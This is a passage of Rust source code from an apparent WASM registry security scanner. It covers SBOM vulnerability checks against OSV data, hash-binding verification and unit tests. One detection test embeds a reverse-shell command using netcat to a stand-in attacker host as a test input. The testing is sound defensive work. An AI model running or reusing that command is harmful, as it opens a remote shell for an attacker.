923            let current = outcome.score as i32;
924            let new = (current - 5).clamp(0, 100);
925            outcome.score = new as i16;
926        }
927        SbomBinding::Mismatch { declared } => {
928            append_finding(
929                outcome,
930                json!({
931                    "severity": "critical",
932                    "category": "supply_chain",
933                    "title": "SBOM claims a different artifact",
934                    "description": format!(
935                        "SBOM declared SHA-256 `{}`, but the published artifact hashes to a different value. The SBOM is not about this WASM — dependency scanning was skipped and the artifact is marked fail.",
936                        declared
937                    )
938                }),
939            );
940            // Very strong signal of supply-chain tampering.
941            let current = outcome.score as i32;
942            let new = (current - 60).clamp(0, 100);
943            outcome.score = new as i16;
944            outcome.status = if new >= 70 {
945                outcome.status.clone()
946            } else if new >= 40 {
947                "warning".to_string()
948            } else {
949                "fail".to_string()
950            };
951        }
952    }
953}
954
955/// DB-backed variant of `apply_sbom_findings`. Walks the SBOM components
956/// and looks each up in the `osv_vulnerabilities` cache. Falls back to the
957/// hardcoded list only when the cache is empty (fresh install before the
958/// first OSV sync has run) — in steady state we want real advisories.
959async fn apply_sbom_findings_async(
960    store: &dyn crate::store::RegistryStore,
961    outcome: &mut ScanOutcome,
962    sbom: &JsonValue,
963) {
964    let cache_empty = store.count_osv_advisories().await.unwrap_or(0) == 0;
965    if cache_empty {
966        // Bootstrap path: no live data yet, keep the hardcoded list
967        // active so the scanner isn't silent on fresh installs.
968        apply_sbom_findings(outcome, sbom);
969        append_finding(
970            outcome,
971            json!({
972                "severity": "info",
973                "category": "other",
974                "title": "Using seed vulnerability list",
975                "description": "OSV advisory cache is empty — the scanner fell back to the built-in seed list. Run the osv_sync worker to populate the cache."
976            }),
977        );
978        return;
979    }
980
981    let components = match sbom.get("components").and_then(|c| c.as_array()) {
982        Some(c) => c,
983        None => {
984            append_finding(
985                outcome,
986                json!({
987                    "severity": "info",
988                    "category": "other",
989                    "title": "SBOM has no 'components' array",
990                    "description": "Expected CycloneDX-shaped SBOM with a top-level 'components' array. Vulnerability check skipped."
991                }),
992            );
993            return;
994        }
995    };
996
997    let mut checked = 0usize;
998    let mut score_delta: i32 = 0;
999    for comp in components {
1000        let Some((ecosystem, name, version)) = parse_component(comp) else {
1001            continue;
1002        };
1003        checked += 1;
1004
1005        let matches = match store.find_osv_matches(&ecosystem, &name, &version).await {
1006            Ok(m) => m,
1007            Err(e) => {
1008                warn!("osv lookup failed for {}:{}@{}: {}", ecosystem, name, version, e);
1009                continue;
1010            }
1011        };
1012
1013        for m in matches {
1014            let penalty: i32 = match m.severity.as_str() {
1015                "critical" => 40,
1016                "high" => 20,
1017                "medium" => 8,
1018                _ => 3,
1019            };
1020            score_delta = score_delta.saturating_add(penalty);
1021            append_finding(
1022                outcome,
1023                json!({
1024                    "severity": m.severity,
1025                    "category": "vulnerable_dependency",
1026                    "title": format!(
1027                        "{}: {}:{}@{}",
1028                        m.advisory_id, ecosystem, name, version
1029                    ),
1030                    "description": m.summary,
1031                }),
1032            );
1033        }
1034    }
1035
1036    append_finding(
1037        outcome,
1038        json!({
1039            "severity": "info",
1040            "category": "other",
1041            "title": "SBOM scanned against OSV cache",
1042            "description": format!(
1043                "Checked {} component(s) against the live OSV advisory cache.",
1044                checked
1045            )
1046        }),
1047    );
1048
1049    if score_delta > 0 {
1050        let current = outcome.score as i32;
1051        let new = (current - score_delta).clamp(0, 100);
1052        outcome.score = new as i16;
1053        outcome.status = if new >= 70 {
1054            outcome.status.clone()
1055        } else if new >= 40 {
1056            "warning".to_string()
1057        } else {
1058            "fail".to_string()
1059        };
1060    }
1061}
1062
1063/// Parse the SBOM, scan its components against the hardcoded vulnerability
1064/// list, and append findings (+ decrement the score) on `outcome` in place.
1065///
1066/// The parser is intentionally forgiving: unknown/unexpected shapes just
1067/// record an informational finding. We never fail the whole scan because
1068/// the SBOM itself is malformed — that would be hostile to publishers
1069/// experimenting with the feature.
1070fn apply_sbom_findings(outcome: &mut ScanOutcome, sbom: &JsonValue) {
1071    let components = match sbom.get("components").and_then(|c| c.as_array()) {
1072        Some(c) => c,
1073        None => {
1074            append_finding(
1075                outcome,
1076                json!({
1077                    "severity": "info",
1078                    "category": "other",
1079                    "title": "SBOM has no 'components' array",
1080                    "description": "Expected CycloneDX-shaped SBOM with a top-level 'components' array. Vulnerability check skipped."
1081                }),
1082            );
1083            return;
1084        }
1085    };
1086
1087    let mut checked = 0usize;
1088    let mut score_delta: i32 = 0;
1089    for comp in components {
1090        // CycloneDX: { "name": "...", "version": "...", "purl": "pkg:npm/foo@1.2.3", ... }
1091        // We support either (name, version, type) or just purl.
1092        let Some((ecosystem, name, version)) = parse_component(comp) else {
1093            continue;
1094        };
1095        checked += 1;
1096
1097        for (vuln_eco, vuln_name, vuln_prefix, severity, description) in KNOWN_VULNERABLE_PACKAGES {
1098            if *vuln_eco != ecosystem || *vuln_name != name {
1099                continue;
1100            }
1101            if !vuln_prefix.is_empty() && !version.starts_with(vuln_prefix) {
1102                continue;
1103            }
1104            let penalty: i32 = match *severity {
1105                "critical" => 40,
1106                "high" => 20,
1107                "medium" => 8,
1108                _ => 3,
1109            };
1110            score_delta = score_delta.saturating_add(penalty);
1111            append_finding(
1112                outcome,
1113                json!({
1114                    "severity": severity,
1115                    "category": "vulnerable_dependency",
1116                    "title": format!("Known-bad dependency: {}:{}@{}", ecosystem, name, version),
1117                    "description": description,
1118                }),
1119            );
1120        }
1121    }
1122
1123    append_finding(
1124        outcome,
1125        json!({
1126            "severity": "info",
1127            "category": "other",
1128            "title": "SBOM scanned",
1129            "description": format!(
1130                "Checked {} component(s) against {} known-vulnerable entries.",
1131                checked,
1132                KNOWN_VULNERABLE_PACKAGES.len()
1133            )
1134        }),
1135    );
1136
1137    if score_delta > 0 {
1138        let current = outcome.score as i32;
1139        let new = (current - score_delta).clamp(0, 100);
1140        outcome.score = new as i16;
1141        // If we dropped below the pass threshold, downgrade the verdict.
1142        outcome.status = if new >= 70 {
1143            outcome.status.clone()
1144        } else if new >= 40 {
1145            "warning".to_string()
1146        } else {
1147            "fail".to_string()
1148        };
1149    }
1150}
1151
1152/// Extract `(ecosystem, name, version)` from a CycloneDX-shaped component.
1153/// Handles both the `purl` shortcut and the explicit `{type, name, version}`
1154/// triple. Returns `None` for components that are too underspecified to
1155/// cross-reference (which we silently skip rather than flag).
1156fn parse_component(comp: &JsonValue) -> Option<(String, String, String)> {
1157    if let Some(purl) = comp.get("purl").and_then(|v| v.as_str()) {
1158        // pkg:ecosystem/name@version
1159        if let Some(rest) = purl.strip_prefix("pkg:") {
1160            let mut parts = rest.splitn(2, '/');
1161            let ecosystem = parts.next()?.to_ascii_lowercase();
1162            let name_ver = parts.next()?;
1163            let mut nv = name_ver.splitn(2, '@');
1164            let name = nv.next()?.to_string();
1165            let version = nv.next().unwrap_or("").to_string();
1166            return Some((ecosystem, name, version));
1167        }
1168    }
1169    let name = comp.get("name")?.as_str()?.to_string();
1170    let version = comp.get("version").and_then(|v| v.as_str()).unwrap_or("").to_string();
1171    // "type" in CycloneDX is "library" etc; we infer ecosystem from
1172    // `purl` when available, otherwise fall back to "unknown".
1173    let ecosystem = comp
1174        .get("group")
1175        .and_then(|v| v.as_str())
1176        .map(str::to_ascii_lowercase)
1177        .unwrap_or_else(|| "unknown".to_string());
1178    Some((ecosystem, name, version))
1179}
1180
1181fn append_finding(outcome: &mut ScanOutcome, finding: JsonValue) {
1182    match &mut outcome.findings {
1183        JsonValue::Array(arr) => arr.push(finding),
1184        _ => {
1185            outcome.findings = JsonValue::Array(vec![finding]);
1186        }
1187    }
1188}
1189
/// Lowercase hex rendering of `bytes`, two characters per byte.
fn hex_encode(bytes: &[u8]) -> String {
    use std::fmt::Write;

    let mut out = String::with_capacity(bytes.len() * 2);
    for b in bytes {
        // `{:02x}` emits the same lowercase, zero-padded nibble pair as
        // the old table-lookup implementation; writing to a String is
        // infallible, so the Result can be ignored.
        let _ = write!(out, "{:02x}", b);
    }
    out
}
1199
1200#[cfg(test)]
1201mod tests {
1202    use super::*;
1203
    /// Minimal legal WASM module: the 4-byte magic (`\0asm`) + version 1 in
    /// little-endian, and nothing else. Parses cleanly via wasmparser.
    const EMPTY_WASM: &[u8] = b"\0asm\x01\x00\x00\x00";
1207
1208    fn sha256_hex(bytes: &[u8]) -> String {
1209        hex_encode(&Sha256::digest(bytes))
1210    }
1211
1212    #[test]
1213    fn hex_encode_matches_sha2_hex_crate() {
1214        let digest = Sha256::digest(b"hello world");
1215        assert_eq!(hex_encode(&digest), hex::encode(digest));
1216    }
1217
1218    #[test]
1219    fn contains_subslice_edge_cases() {
1220        assert!(!contains_subslice(b"", b"abc"));
1221        assert!(!contains_subslice(b"ab", b"abc"));
1222        assert!(!contains_subslice(b"ab", b""));
1223        assert!(contains_subslice(b"abcdef", b"cde"));
1224        assert!(contains_subslice(b"abcdef", b"a"));
1225        assert!(contains_subslice(b"abcdef", b"f"));
1226        assert!(!contains_subslice(b"abcdef", b"xyz"));
1227    }
1228
1229    #[test]
1230    fn analyze_empty_module_is_clean() {
1231        let checksum = sha256_hex(EMPTY_WASM);
1232        let outcome = analyze_bytes(EMPTY_WASM, EMPTY_WASM.len() as i64, &checksum);
1233        assert_eq!(outcome.status, "pass");
1234        assert!(outcome.score >= 70, "expected passing score, got {}", outcome.score);
1235    }
1236
1237    #[test]
1238    fn analyze_rejects_non_wasm_magic() {
1239        let junk = b"not-a-wasm-file";
1240        let outcome = analyze_bytes(junk, junk.len() as i64, &sha256_hex(junk));
1241        assert_eq!(outcome.status, "fail");
1242        assert_eq!(outcome.score, 0);
1243        let findings = outcome.findings.as_array().unwrap();
1244        assert!(findings
1245            .iter()
1246            .any(|f| f["title"].as_str().unwrap().contains("Not a valid WebAssembly module")));
1247    }
1248
1249    #[test]
1250    fn analyze_flags_checksum_mismatch() {
1251        let outcome = analyze_bytes(EMPTY_WASM, EMPTY_WASM.len() as i64, "deadbeef");
1252        let findings = outcome.findings.as_array().unwrap();
1253        assert!(findings.iter().any(|f| f["title"].as_str().unwrap() == "Checksum mismatch"));
1254        assert!(outcome.score < 50);
1255    }
1256
1257    #[test]
1258    fn analyze_flags_size_mismatch() {
1259        let outcome = analyze_bytes(EMPTY_WASM, 999_999, &sha256_hex(EMPTY_WASM));
1260        let findings = outcome.findings.as_array().unwrap();
1261        assert!(findings
1262            .iter()
1263            .any(|f| f["title"].as_str().unwrap() == "Artifact size mismatch"));
1264    }
1265
1266    #[test]
1267    fn analyze_detects_suspicious_byte_pattern() {
1268        // Append a known-bad marker after a valid empty module; the WASM
1269        // parser will stop after the fixed header but the byte-pattern
1270        // scan still fires.
1271        let mut bytes = EMPTY_WASM.to_vec();
1272        bytes.extend_from_slice(b"nc -e /bin/sh attacker.example.com 4444");
1273        let checksum = sha256_hex(&bytes);
1274        let outcome = analyze_bytes(&bytes, bytes.len() as i64, &checksum);
1275        assert_eq!(outcome.status, "fail");
1276        let findings = outcome.findings.as_array().unwrap();
1277        assert!(findings.iter().any(|f| {
1278            f["title"].as_str().unwrap().contains("reverse shell")
1279                || f["title"].as_str().unwrap().contains("Suspicious byte pattern")
1280        }));
1281    }
1282
1283    #[test]
1284    fn analyze_flags_unexpected_wasm_version() {
1285        // Valid magic, bogus version 2.
1286        let bytes = b"\0asm\x02\x00\x00\x00";
1287        let checksum = sha256_hex(bytes);
1288        let outcome = analyze_bytes(bytes, bytes.len() as i64, &checksum);
1289        let findings = outcome.findings.as_array().unwrap();
1290        assert!(findings
1291            .iter()
1292            .any(|f| f["title"].as_str().unwrap() == "Unexpected WASM binary version"));
1293    }
1294
1295    fn clean_outcome() -> ScanOutcome {
1296        ScanOutcome {
1297            status: "pass".to_string(),
1298            score: 100,
1299            findings: JsonValue::Array(vec![]),
1300        }
1301    }
1302
1303    #[test]
1304    fn sbom_flags_known_bad_via_purl() {
1305        let sbom = serde_json::json!({
1306            "components": [
1307                { "purl": "pkg:npm/event-stream@3.3.6" },
1308                { "purl": "pkg:npm/leftpad@1.0.0" }, // clean
1309            ]
1310        });
1311        let mut outcome = clean_outcome();
1312        apply_sbom_findings(&mut outcome, &sbom);
1313        assert_eq!(outcome.status, "warning"); // 100 - 40 = 60
1314        assert_eq!(outcome.score, 60);
1315        let findings = outcome.findings.as_array().unwrap();
1316        assert!(findings.iter().any(|f| f["title"].as_str().unwrap().contains("event-stream")));
1317    }
1318
1319    #[test]
1320    fn sbom_flags_version_prefix_match() {
1321        // openssl-src entry uses prefix "111.0." — should match 111.0.5 but
1322        // not 300.1.0.
1323        let sbom = serde_json::json!({
1324            "components": [
1325                { "purl": "pkg:cargo/openssl-src@111.0.5" },
1326                { "purl": "pkg:cargo/openssl-src@300.1.0" },
1327            ]
1328        });
1329        let mut outcome = clean_outcome();
1330        apply_sbom_findings(&mut outcome, &sbom);
1331        let findings = outcome.findings.as_array().unwrap();
1332        let hits: Vec<_> = findings
1333            .iter()
1334            .filter(|f| f["title"].as_str().unwrap().contains("openssl-src"))
1335            .collect();
1336        assert_eq!(hits.len(), 1, "only the 111.0.x row should match");
1337    }
1338
1339    #[test]
1340    fn sbom_clean_manifest_passes() {
1341        let sbom = serde_json::json!({
1342            "components": [
1343                { "purl": "pkg:npm/leftpad@1.0.0" },
1344                { "purl": "pkg:cargo/serde@1.0.200" },
1345            ]
1346        });
1347        let mut outcome = clean_outcome();
1348        apply_sbom_findings(&mut outcome, &sbom);
1349        assert_eq!(outcome.status, "pass");
1350        assert_eq!(outcome.score, 100);
1351    }
1352
1353    #[test]
1354    fn sbom_malformed_records_informational_finding() {
1355        let sbom = serde_json::json!({ "wrong_root": [] });
1356        let mut outcome = clean_outcome();
1357        apply_sbom_findings(&mut outcome, &sbom);
1358        // Score stays 100; we just note that we couldn't read it.
1359        assert_eq!(outcome.status, "pass");
1360        assert_eq!(outcome.score, 100);
1361        let findings = outcome.findings.as_array().unwrap();
1362        assert!(findings
1363            .iter()
1364            .any(|f| f["title"].as_str().unwrap().contains("no 'components'")));
1365    }
1366
1367    #[test]
1368    fn sbom_binding_bound_when_digest_matches() {
1369        let sbom = serde_json::json!({
1370            "metadata": {
1371                "component": {
1372                    "name": "my-plugin",
1373                    "hashes": [
1374                        { "alg": "SHA-256", "content": "DEADbeef" }
1375                    ]
1376                }
1377            }
1378        });
1379        let binding = verify_sbom_binding(&sbom, "deadbeef");
1380        assert!(matches!(binding, SbomBinding::Bound));
1381    }
1382
1383    #[test]
1384    fn sbom_binding_unsigned_when_no_digest() {
1385        let sbom = serde_json::json!({
1386            "components": [
1387                { "purl": "pkg:npm/leftpad@1.0.0" }
1388            ]
1389        });
1390        let binding = verify_sbom_binding(&sbom, "deadbeef");
1391        assert!(matches!(binding, SbomBinding::Unsigned));
1392    }
1393
1394    #[test]
1395    fn sbom_binding_mismatch_when_digest_disagrees() {
1396        let sbom = serde_json::json!({
1397            "metadata": {
1398                "component": {
1399                    "hashes": [
1400                        { "alg": "SHA-256", "content": "aaaa1111" }
1401                    ]
1402                }
1403            }
1404        });
1405        let binding = verify_sbom_binding(&sbom, "bbbb2222");
1406        match binding {
1407            SbomBinding::Mismatch { declared } => {
1408                assert_eq!(declared, "aaaa1111");
1409            }
1410            other => panic!("expected Mismatch, got {:?}", other),
1411        }
1412    }
1413
1414    #[test]
1415    fn sbom_binding_walks_component_hashes_too() {
1416        // Some CycloneDX exporters put hashes on components[] instead of
1417        // metadata.component. Both should be consulted.
1418        let sbom = serde_json::json!({
1419            "components": [
1420                {
1421                    "name": "my-plugin",
1422                    "hashes": [
1423                        { "alg": "sha-256", "content": "CAFEBABE" }
1424                    ]
1425                }
1426            ]
1427        });
1428        let binding = verify_sbom_binding(&sbom, "cafebabe");
1429        assert!(matches!(binding, SbomBinding::Bound));
1430    }
1431
1432    #[test]
1433    fn record_binding_mismatch_downgrades_outcome() {
1434        let mut outcome = clean_outcome();
1435        record_sbom_binding(
1436            &mut outcome,
1437            &SbomBinding::Mismatch {
1438                declared: "aaaa1111".to_string(),
1439            },
1440        );
1441        // 100 - 60 = 40 → warning threshold.
1442        assert_eq!(outcome.score, 40);
1443        assert_eq!(outcome.status, "warning");
1444
1445        // A second artifact that was already warning-grade before the
1446        // mismatch should drop straight into fail.
1447        let mut warn_outcome = ScanOutcome {
1448            status: "warning".to_string(),
1449            score: 60,
1450            findings: JsonValue::Array(vec![]),
1451        };
1452        record_sbom_binding(
1453            &mut warn_outcome,
1454            &SbomBinding::Mismatch {
1455                declared: "aaaa1111".to_string(),
1456            },
1457        );
1458        assert_eq!(warn_outcome.score, 0);
1459        assert_eq!(warn_outcome.status, "fail");
1460    }
1461
1462    #[test]
1463    fn record_binding_unsigned_keeps_pass_with_minor_penalty() {
1464        let mut outcome = clean_outcome();
1465        record_sbom_binding(&mut outcome, &SbomBinding::Unsigned);
1466        assert_eq!(outcome.status, "pass");
1467        assert_eq!(outcome.score, 95);
1468    }
1469}